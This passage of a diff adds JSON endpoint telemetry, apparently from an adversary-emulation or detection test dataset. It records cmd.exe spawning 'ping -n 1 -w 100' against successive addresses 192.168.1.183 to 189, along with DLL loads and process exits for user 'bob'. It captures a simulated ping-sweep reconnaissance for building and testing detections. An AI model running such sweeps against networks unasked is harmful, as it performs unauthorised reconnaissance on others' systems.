"rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "process", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572881990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.183", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572882140000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "event_type": "process", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572886830000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.184", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1748, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572886980000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "event_type": "process", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572891830000, + "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.185", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4832, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4832, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572891980000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "event_type": "process", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572896990000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.186", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572897130000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897140000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572897300000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "event_type": "process", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572901830000, + "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.187", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572901980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "event_type": "process", + 
"pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572906830000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.188", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7836, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + 
"unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572906980000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "event_type": "process", + "pid": 7836, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572911990000, + "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.189", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3136, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572912130000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": 
